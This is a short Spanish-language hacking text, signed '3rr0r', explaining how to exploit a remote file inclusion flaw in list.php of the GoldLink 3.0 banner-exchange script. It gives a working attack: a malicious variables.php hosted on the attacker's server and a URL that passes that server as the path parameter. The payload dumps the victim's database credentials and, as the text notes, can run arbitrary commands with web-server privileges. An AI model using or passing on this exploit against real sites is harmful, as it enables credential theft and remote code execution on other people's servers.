Esta técnica funciona en los sitios con intercambio de banners.
Existe un bug en el fichero list.php que viene con el GoldLink 3.0.
Dicho fichero esta programado para ser \'llamado\' desde la pagina que programa el
Webmaster mediante un include().
Para ser exactos y sacado del Leame.txt:
Al comienzo de su página (antes de) debe agregar las siguientes líneas:
**********************************************************
#?php
$path=\"/path/al/script/goldlink\"; // Sin barra al final
include(\"goldlink/list.php\");
?#
**********************************************************
Cambien # por < y >
Con lo cual se supone que la variable path ya esta definida. Ahora veamos las
primeras líneas del list.php:
*****************************************
include(\"$path/variables.php\&qquot;);
$link=Conectarse();
*****************************************
Si llamamos al list.php directamente le podemos meter en la variable path lo que queramos.
Aquí una demostración:
Nos vamos a cualquier servidor que no soporte PHP y creamos el fichero variables.php
con el siguiente contenido:
**********************************
#?
function Conectarse()
{
$fp=fopen(\"variables.php\",r);
fpassthru($fp);
die();
}
?#
**********************************
Después vamos a nuestro navegador y tecleamos:
***************************************************************************
http://www.victima.com/goldlink/list.php?path=http://www.nuestroserver.com
***************************************************************************
Le damos enter, ponemos ver código fuente y tenemos el fichero en cuestión con las
claves de la base de datos.
En vez de eso podríamos haber hecho otra cosa, como system(\"ls -l\"), leer otro
fichero, etc.
Solo hay que meter el código que queramos en la función Conectarse() de nuestro server,
y se ejecutará en el server de la victima con privilegios de http.
***************************************************************************
***************************************************************************
Editado por 3rr0r
